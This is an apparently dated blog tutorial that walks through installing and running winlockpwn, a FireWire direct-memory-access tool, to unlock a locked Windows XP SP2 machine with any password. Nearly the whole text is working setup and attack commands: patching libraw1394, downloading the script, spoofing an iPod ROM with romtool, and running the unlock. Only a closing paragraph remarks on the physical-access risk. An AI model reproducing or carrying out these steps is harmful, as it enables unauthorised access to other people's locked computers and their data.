winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right?
I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:
sudo aptitude install libdc1394-13 libraw1394-dev swig python
Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz tar -zxvf Python-2.3.6.tgz cd Python-2.3.6 ./configure make sudo make install
The next step is to modify libraw1394:
sudo vim /usr/include/libraw1394/raw1394.h
At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.
And of course, we need to untar it
tar -zxvf pythonraw1394-1.0.tar.gz
Now we need to go into the untared directory and download the actual winlockpwn script:
cd pythonraw1394 wget http://www.storm.net.nz/static/files/winlockpwn
The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:
chmod +x winlockpwn
Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3’s include directory:
sudo vim Makefile
Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:
The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:
sudo modprobe raw1394 sudo chmod 666 /dev/raw1394
Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:
sudo vim romtool
Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.
./romtool -s 0 ipod.csr
Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
winlockpwn port node target
Mine looked like this:
./winlockpwn 0 1 1
Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.
There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.